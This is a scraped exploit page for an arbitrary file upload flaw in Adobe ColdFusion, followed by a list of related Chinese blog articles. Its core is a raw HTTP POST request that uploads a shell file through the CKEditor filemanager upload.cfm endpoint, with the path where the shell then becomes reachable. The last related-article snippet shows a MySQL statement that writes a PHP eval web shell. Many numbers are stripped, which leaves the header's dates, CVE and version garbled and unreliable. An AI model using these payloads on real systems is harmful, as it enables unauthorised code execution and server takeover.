# Exploit Title: Unrestricted file upload in Adobe ColdFusion

# Google Dork: ext:cfm

# Date: --

# Exploit Author: Pete Freitag of Foundeo

# Reversed: Vahagn vah_13 Vardanian

# Vendor Homepage: adobe.com

# Version:

# Tested on: Adobe ColdFusion

# CVE : CVE--

# Comment: September , : Updates for ColdFusion  and ColdFusion

 have been elevated to Priority  due to a report that CVE--

is now being actively exploited.

```

POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm

HTTP/1.1

Host: coldfusion:port

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML,

like Gecko) Chrome/62.0.3202.9 Safari/537.36

Content-Type: multipart/form-data;

boundary=---------------------------

Content-Length:

Connection: close

Upgrade-Insecure-Requests: 

-----------------------------

Content-Disposition: form-data; name="file"; filename="shell_file"

Content-Type: image/jpeg

%shell code here%

-----------------------------

Content-Disposition: form-data; name="path"

shell

-------------------------------

```

a shell will be located here http://coldfusion:port/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/shell_file

[EXP]Adobe ColdFusion 2018 - Arbitrary File Upload的更多相关文章

  1. FIneCMS /dayrui/libraries/Chart/ofc_upload_image.php Arbitrary File Upload Vul

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 Relevant Link: http://www.wooyun.org ...

  2. jQuery File Upload 单页面多实例的实现

    jQuery File Upload 的 GitHub 地址:https://github.com/blueimp/jQuery-File-Upload 插件描述:jQuery File Upload ...

  3. 【转发】Html5 File Upload with Progress

    Html5 File Upload with Progress               Posted by Shiv Kumar on 25th September, 2010Senior Sof ...

  4. struts2 CVE-2012-0392 S2-008 Strict DMI does not work correctly allows remote command execution and arbitrary file overwrite

    catalog . Description . Effected Scope . Exploit Analysis . Principle Of Vulnerability . Patch Fix 1 ...

  5. CVE-2019-0214: Apache Archiva arbitrary file write and delete on the server

    CVE-2019-0214: Apache Archiva arbitrary file write and delete on the server Severity: Medium Vendor: ...

  6. jQuery File Upload done函数没有返回

    最近在使用jQuery File Upload 上传图片时发现一个问题,发现done函数没有callback,经过一番折腾,找到问题原因,是由于dataType: ‘json’造成的,改为autoUp ...

  7. kindeditor多图片上传找不到action原来是private File upload成员变量惹得祸

    kindeditor多图片上传找不到action原来是private File upload成员变量惹得祸

  8. 用jQuery File Upload做的上传控件demo,支持同页面多个上传按钮

    需求 有这么一个需求,一个form有多个文件要上传,但又不是传统的图片批量上传那种,是类似下图这种需求,一开始是用的swfupload做的上传,但是问题是如果有多个按钮的话,就要写很多重复的代码,于为 ...

  9. jquery file upload 文件上传插件

    1. jquery file upload 下载 jquery file upload Demo 地址:https://blueimp.github.io/jQuery-File-Upload/ jq ...

随机推荐

  1. poj2115(扩展欧基里德定理)

    题目链接:https://vjudge.net/problem/POJ-2115 题意:模拟for循环for(int i=A;i!=B;i+=C),且数据范围为k位无符号数以内,即0~1<< ...

  2. 网络文件系统NFS

    NFS介绍 什么是NFS? NFS是Network File System的缩写,即网络文件系统.它的主要功能是通过网络(一般是局域网)让不同的主机系统之间可以共享文件或目录.NFS客户端(一般为应用 ...

  3. 微信小程序记账本进度二

    二.1,下载微信web开发者工具 2,使用新注册的账号登录,并创建工程

  4. FortiGate端口聚合配置

    1.端口聚合(LACP)应用场景 该功能高端设备上支持,FortiGate60D.FortiGate90D和FortiGate240D等低端型号不支持. 1.在带宽比较紧张的情况下,通过逻辑聚合可以扩 ...

  5. 654. Maximum Binary Tree 最大节点劈开,然后左边、右边排序

    [抄题]: Given an integer array with no duplicates. A maximum tree building on this array is defined as ...

  6. 改变this的指向问题;

    用call()和apply()改变this的指向,那什么时候用this呢?(构造函数),那为什么要用构造函数呢?(为了生成对象). 1.解决函数内this指向的问题 (1)var that/_this ...

  7. PHP开发——变量

    变量的概念 l  变量是临时存储数据的容器: l  变量是存储内存当中: l  我们现实中有很多数据:姓名.性别.年龄.学历等: l  在计算机中,用变量来代替一个一个的数据: l  我们可以把计算机 ...

  8. Silverlight实用窍门系列:68.Silverlight的资源字典ResourceDictionary

      允许转载,转载时请务必以超链接形式标明文章 原始出处 .作者信息和本声明.否则将追究法律责任.http://chengxingliang.blog.51cto.com/3972944/886643 ...

  9. 批量屏蔽符合条件的IP地址,支持添加白名单,IP段,增量,大于指定次数的IP

    批量屏蔽符合条件的IP地址,支持添加白名单,IP段,增量 大概的思路是利用sh,从日志中提取出来对应的IP地址,然后再交由python进行对比,判断,最终将需要添加至iptables列表中的IP写入到 ...

  10. 一句话shell【php】

    1.mysql执行语句拿shell Create TABLE a (cmd text NOT NULL); Insert INTO a (cmd) VALUES('<?php @eval($_P ...